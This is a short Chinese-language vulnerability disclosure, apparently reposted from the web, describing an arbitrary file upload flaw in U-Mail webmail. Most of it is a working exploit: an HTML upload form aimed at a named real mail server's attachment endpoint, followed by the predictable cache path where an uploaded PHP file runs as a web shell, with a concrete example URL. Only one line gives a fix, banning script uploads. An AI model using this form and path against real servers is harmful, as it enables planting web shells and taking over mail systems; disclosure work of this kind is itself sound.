先登录官方测试站点:
再获取当前登录用户的user_id
html exp:
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <FORM name=form1 method=post action="http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data> 上传文件:<input type="file" name="Filedata" size="30"> <INPUT type=submit value=上传 name=Submit>
上传后获取"file_id":"13995534500"
shell地址:
http://mail.comingchina.com/webmail/client/cache/{user_id}/{file_id}.php
这里是:
http://mail.comingchina.com/webmail/client/cache/78609/13995534500.php
修复方案:
禁止上传php等脚本文件。
查看更多关于U-Mail任意文件上传漏洞一枚及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15320